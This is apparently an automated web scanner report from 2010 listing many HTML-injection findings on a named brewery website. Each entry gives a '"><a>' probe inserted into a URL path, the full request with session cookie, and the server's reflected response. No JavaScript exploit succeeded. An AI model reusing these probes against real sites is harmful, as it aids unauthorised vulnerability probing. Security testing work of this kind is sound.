This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content4c9a9"><a>41638d41753/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:45 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab306"><a>4a7c751f450 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentab306"><a>4a7c751f450/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:54 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d322"><a>02b1c89f5f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content1d322"><a>02b1c89f5f6/js/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:01 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f630"><a>d1f857ac5af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content5f630"><a>d1f857ac5af/js/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:02 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff1c"><a>27664a239f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentcff1c"><a>27664a239f7/js/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:06 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21677"><a>0ffcc0b4ab4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content21677"><a>0ffcc0b4ab4/js/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:03 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 703df"><a>def2f74c18c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content703df"><a>def2f74c18c/js/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:02 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75f69"><a>6334a4eb341 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content75f69"><a>6334a4eb341/js/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:04 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105ab"><a>d599d76d4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dock_sales105ab"><a>d599d76d4e6/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:46 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd31"><a>f3a63f771b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dock_sales6fd31"><a>f3a63f771b0/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:03 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6149e"><a>8921298afbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dock_sales6149e"><a>8921298afbf/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:11 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d6e"><a>dd2ead7ff0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dock_salesa1d6e"><a>dd2ead7ff0c/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:17 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8fe0"><a>4f3395768f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dock_salesa8fe0"><a>4f3395768f5/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:20 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f54"><a>08505ab97bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dock_sales62f54"><a>08505ab97bb/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:21 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d7cc"><a>edb42030abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dock_sales2d7cc"><a>edb42030abb/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:23 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac883"><a>11e27ca78ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etcac883"><a>11e27ca78ba/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:50 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d715"><a>980bc464eba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etc6d715"><a>980bc464eba/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:23 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a18"><a>2377f254faf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etc92a18"><a>2377f254faf/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:22 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e31"><a>0c94de8f97e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etcf2e31"><a>0c94de8f97e/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:24 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 739ca"><a>0576c1b8f9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etc739ca"><a>0576c1b8f9a/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:23 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a787d"><a>f50a6829e24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etca787d"><a>f50a6829e24/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba87c"><a>6ea40b41fee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etcba87c"><a>6ea40b41fee/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:24 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c518f"><a>4156b07e886 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookc518f"><a>4156b07e886/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:48 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e10"><a>2532c6c50e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
